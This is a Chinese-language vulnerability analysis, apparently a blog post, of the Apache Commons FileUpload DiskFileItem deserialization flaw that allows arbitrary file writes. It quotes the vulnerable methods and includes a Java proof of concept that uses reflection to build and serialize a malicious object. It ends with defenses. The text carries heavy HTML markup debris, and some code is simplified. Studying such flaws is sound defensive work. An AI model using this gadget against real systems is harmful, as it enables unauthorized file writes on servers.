Apache Commons FileUpload DiskFileItem 反序列化漏洞分析<\/h1>

漏洞概述<\/h2>
Apache Commons FileUpload 组件中的 `DiskFileItem<\/code> 类存在反序列化漏洞，攻击者可以通过构造恶意的序列化对象，在目标系统上实现任意文件写入。该漏洞源于 DiskFileItem<\/code> 类的 readObject<\/code> 方法中存在不安全的反序列化逻辑，结合反射机制可被利用来写入任意文件内容到任意位置。<\/p>`

漏洞原理分析<\/h2>
关键类与方法<\/h3>
漏洞核心位于 org.apache.commons.fileupload.disk.DiskFileItem<\/code> 类，主要涉及以下关键方法：<\/p>

readObject()<\/strong> - 反序列化时的入口方法<\/li>
writeObject()<\/strong> - 序列化时的方法<\/li>
get()<\/strong> - 获取文件内容的方法<\/li>
getOutputStream()<\/strong> - 获取输出流的方法<\/li>
<\/ol>
漏洞触发流程<\/h3>


反序列化入口<\/strong>：当反序列化 DiskFileItem<\/code> 对象时，会调用 readObject<\/code> 方法：<\/p>
private<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream in)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>    in.<\/span>defaultReadObject<\/span>();<\/span>
<\/span><\/span>    OutputStream output =<\/span> this<\/span>.<\/span>getOutputStream<\/span>();<\/span>
<\/span><\/span>    if<\/span> (<\/span>this<\/span>.<\/span>cachedContent<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        output.<\/span>write<\/span>(<\/span>this<\/span>.<\/span>cachedContent<\/span>);<\/span> \/\/ 关键漏洞点：将cachedContent写入输出流
<\/span><\/span><\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        FileInputStream input =<\/span> new<\/span> FileInputStream(<\/span>this<\/span>.<\/span>dfosFile<\/span>);<\/span>
<\/span><\/span>        IOUtils.<\/span>copy<\/span>(<\/span>input,<\/span> output);<\/span>
<\/span><\/span>        this<\/span>.<\/span>dfosFile<\/span>.<\/span>delete<\/span>();<\/span>
<\/span><\/span>        this<\/span>.<\/span>dfosFile<\/span> =<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    output.<\/span>close<\/span>();<\/span>
<\/span><\/span>    this<\/span>.<\/span>cachedContent<\/span> =<\/span> null<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>

cachedContent来源<\/strong>：cachedContent<\/code> 在序列化时通过 writeObject<\/code> 方法设置：<\/p>
private<\/span> void<\/span> writeObject<\/span>(<\/span>ObjectOutputStream out)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>    if<\/span> (<\/span>this<\/span>.<\/span>dfos<\/span>.<\/span>isInMemory<\/span>())<\/span> {<\/span>
<\/span><\/span>        this<\/span>.<\/span>cachedContent<\/span> =<\/span> this<\/span>.<\/span>get<\/span>();<\/span> \/\/ 关键点：通过get()方法获取内容
<\/span><\/span><\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        this<\/span>.<\/span>cachedContent<\/span> =<\/span> null<\/span>;<\/span>
<\/span><\/span>        this<\/span>.<\/span>dfosFile<\/span> =<\/span> this<\/span>.<\/span>dfos<\/span>.<\/span>getFile<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    out.<\/span>defaultWriteObject<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>

get()方法逻辑<\/strong>：get()<\/code> 方法从 dfos<\/code> 中获取数据：<\/p>
public<\/span> byte<\/span>[]<\/span> get<\/span>()<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>this<\/span>.<\/span>isInMemory<\/span>())<\/span> {<\/span>
<\/span><\/span>        if<\/span> (<\/span>this<\/span>.<\/span>cachedContent<\/span> ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            this<\/span>.<\/span>cachedContent<\/span> =<\/span> this<\/span>.<\/span>dfos<\/span>.<\/span>getData<\/span>();<\/span> \/\/ 关键点：从dfos获取数据
<\/span><\/span><\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> this<\/span>.<\/span>cachedContent<\/span>;<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        \/\/ 从文件读取数据的逻辑
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
漏洞利用关键点<\/h3>

控制dfos字段<\/strong>：通过反射修改 DiskFileItem<\/code> 的 dfos<\/code> 字段，可以控制写入的内容<\/li>
控制sizeThreshold<\/strong>：影响数据是存储在内存还是磁盘<\/li>
控制repository<\/strong>：指定临时文件存储目录<\/li>
<\/ol>
漏洞利用分析<\/h2>
利用步骤<\/h3>

创建 DeferredFileOutputStream<\/code> 对象并写入恶意内容<\/li>
创建 DiskFileItem<\/code> 对象<\/li>
使用反射将 dfos<\/code> 字段设置为恶意构造的 DeferredFileOutputStream<\/code><\/li>
序列化 DiskFileItem<\/code> 对象<\/li>
目标系统反序列化该对象时触发漏洞<\/li>
<\/ol>
关键利用代码<\/h3>
\/\/ 1. 创建DiskFileItem对象
<\/span><\/span><\/span><\/span>DiskFileItem dfi =<\/span> new<\/span> DiskFileItem(<\/span>"test"<\/span>,<\/span>"application\/octet-stream"<\/span>,<\/span>
<\/span><\/span>                    false<\/span>,<\/span>"1111"<\/span>,<\/span>0<\/span>,<\/span>new<\/span> File(<\/span>"C:\\target\\directory"<\/span>));<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 2. 通过反射获取并设置dfos字段
<\/span><\/span><\/span><\/span>Field dfosField =<\/span> dfi.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"dfos"<\/span>);<\/span>
<\/span><\/span>dfosField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 3. 构造恶意的DeferredFileOutputStream
<\/span><\/span><\/span><\/span>DeferredFileOutputStream maliciousDfos =<\/span> new<\/span> DeferredFileOutputStream(<\/span>
<\/span><\/span>    10000<\/span>,<\/span> new<\/span> File(<\/span>"C:\\target\\directory\\malicious.txt"<\/span>));<\/span>
<\/span><\/span>maliciousDfos.<\/span>write<\/span>(<\/span>"malicious content"<\/span>.<\/span>getBytes<\/span>());<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 4. 设置dfos字段
<\/span><\/span><\/span><\/span>dfosField.<\/span>set<\/span>(<\/span>dfi,<\/span> maliciousDfos);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 5. 序列化对象
<\/span><\/span><\/span><\/span>ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>
<\/span><\/span>    Files.<\/span>newOutputStream<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"malicious.ser"<\/span>)));<\/span>
<\/span><\/span>oos.<\/span>writeObject<\/span>(<\/span>dfi);<\/span>
<\/span><\/span><\/code><\/pre>利用细节说明<\/h3>


sizeThreshold控制<\/strong>：<\/p>

设置较大的阈值确保数据存储在内存中，避免提前写入文件<\/li>
在反序列化时，较小的阈值确保数据能写入目标文件<\/li>
<\/ul>
<\/li>

文件写入位置<\/strong>：<\/p>

repository<\/code> 参数指定临时目录<\/li>
DeferredFileOutputStream<\/code> 的构造参数指定最终写入位置<\/li>
<\/ul>
<\/li>

避免提前写入<\/strong>：<\/p>

使用足够大的 sizeThreshold<\/code> 防止 DeferredFileOutputStream<\/code> 在构造时就写入文件<\/li>
<\/ul>
<\/li>
<\/ol>
防御措施<\/h2>

升级组件<\/strong>：升级到修复版本<\/li>
输入验证<\/strong>：对反序列化的数据进行严格验证<\/li>
安全配置<\/strong>：

限制文件上传目录<\/li>
设置适当的文件权限<\/li>
<\/ul>
<\/li>
使用替代方案<\/strong>：考虑使用其他安全的文件上传实现<\/li>
<\/ol>
技术总结<\/h2>
该漏洞的核心在于 DiskFileItem<\/code> 的反序列化过程中，通过反射可以完全控制文件写入的内容和位置。攻击者通过精心构造的序列化对象，利用反射机制修改关键字段，最终实现在目标系统上任意文件写入的能力。理解这一漏洞需要对Java序列化机制、反射API以及DiskFileItem<\/code>的内部实现有深入认识。<\/p>